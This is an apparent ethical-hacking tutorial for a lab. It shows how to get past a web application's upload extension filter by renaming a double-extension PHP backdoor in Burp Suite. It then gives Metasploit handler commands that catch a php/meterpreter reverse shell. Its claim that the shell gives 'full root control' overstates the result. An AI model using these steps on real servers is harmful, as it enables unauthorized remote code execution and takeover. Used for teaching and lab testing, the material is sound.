White Hat Institute

File upload using a double extension method

Some web applications configured at a medium security level only allow uploads of files with certain extensions, such as “.jpeg” and “.png.”

In other words, uploads are restricted to these extensions; anything else is refused by the web server. To bypass this, we need to deceive the web server by submitting a file that carries multiple extensions.

In this example, we will try to upload the same malicious file we used previously, but renamed to “image_file.php.jpeg.” It will appear to be a “.jpeg” file with some data in it, but in reality the “.php” part will be executed, giving us code execution inside the application.

Before jumping into the hands-on activity, let’s set the security level of the target web server to medium.


To be successful in any web application attack, we need to be proficient with the “Burp Suite” tool. “Burp Suite” is a graphical tool designed for testing web application security, intended to provide a comprehensive solution for web application security checks. In addition to core functionality such as the scanner, proxy server, and intruder, the tool also contains more advanced options such as the repeater, spider, comparer, decoder, extender, and sequencer.

Burp Proxy enables manual security testers to intercept all requests and responses between the browser and the target application, even when HTTPS is being used. We can view, edit, or drop individual messages to manipulate the server-side or client-side components of the application.

Kali Linux comes preinstalled with “Burp Suite”; go to the application menu and search for it. Once you have located it, double-click it to start the tool. To intercept all requests and responses between the browser and the server, we need to perform a small configuration change on the browser proxy and point it at Burp’s listening interface. To do so, first go to the “Proxy” tab of “Burp Suite,” and under the “Options” tab, locate the listening interface and note it down.


Then open up your Firefox browser and go to the “General” settings.


Under the “Network Proxy” settings, select the “Manual proxy configuration” option and enter Burp’s listening interface. Now “Burp Suite” is ready to intercept all traffic between the browser and the server.


Let’s upload our malicious file with a double extension onto the web server.


Once you click “Upload,” go to “Burp Suite” to analyze the intercepted request. In the Burp tool, click the “Proxy” tab and go to the “Intercept” tab. Under the “Headers” tab, locate the filename “image_file.php.jpeg” and rename it to “image_file.php,” making sure that the filename stays within the quotation marks. Then click the “Forward” button to let the upload proceed.


As you can see in the image below, we have successfully uploaded our PHP file to a web server running at the medium security level. To exploit it further, copy the path of the uploaded file and paste it into the browser’s address bar.


Before doing that, we need to start the multi/handler and listen for the incoming connection.

Ex:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost
msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > exploit


Now we can paste the path into the browser and run the backdoor on the server side.


Once our malicious file is executed, the attacker’s computer will receive a reverse shell connection with full root control.
